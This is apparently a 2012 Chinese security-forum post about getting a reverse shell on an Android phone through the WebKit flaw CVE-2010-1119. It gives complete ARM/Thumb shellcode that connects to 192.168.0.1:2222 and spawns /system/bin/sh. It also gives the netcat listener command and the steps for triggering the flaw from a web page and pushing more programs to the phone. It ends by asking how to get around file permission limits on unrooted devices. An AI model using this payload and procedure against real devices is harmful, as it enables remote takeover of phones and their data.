-
-
[讨论]有关安卓shell反弹
-
2012-3-28 20:29
12232
-
利用的漏洞是cve-2010-1119
把样本网页扔到服务器里,把以下的shellcode替代网页中的shell变量的内容
(貌似样本网页里的shellcode有问题,所以自己写了一个)
.section .text
.global _start
_start:
.code 32
add r1,pc,#1
bx r1
.code 16
# socket(2, 1, 6)
mov r0, #2
mov r1, #1
mov r2, #6
lsl r7, r1, #8
add r7, r7, #25
svc 0
# connect(r0, &addr, 16)
mov r6, r0
add r1, pc, #40
mov r2, #16
add r7, #2
svc 0
# dup2(r0, 0/1/2)
mov r7, #63
sub r1, r1, r1
mov r0, r6
svc 0
mov r1, #1
mov r0, r6
svc 0
mov r1, #2
mov r0, r6
svc 0
# execve("/system/bin/sh",[], 0)
add r0, pc, #20
sub r2, r2, r2
push {r0, r2}
mov r1, sp
mov r7, #11
svc 0
# struct sockaddr
.align 2
.short 0x2
.short 0xae08
.byte 192,168,0,1
.ascii "/system/bin/sh\0\0"
服务器上打开监听端口(nc -v -l 2222)然后用手机访问服务器触发漏洞,得到shell一枚
然后可以远程执行手机里的nc使用另一个端口(不同于2222)接受服务器发送的程序
问题是,有些目录不能写文件,比如/data/app
有些目录能写文件,却又不能执行
我的测试手机没有root过,请问有什么好方法解决权限问题吗?
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法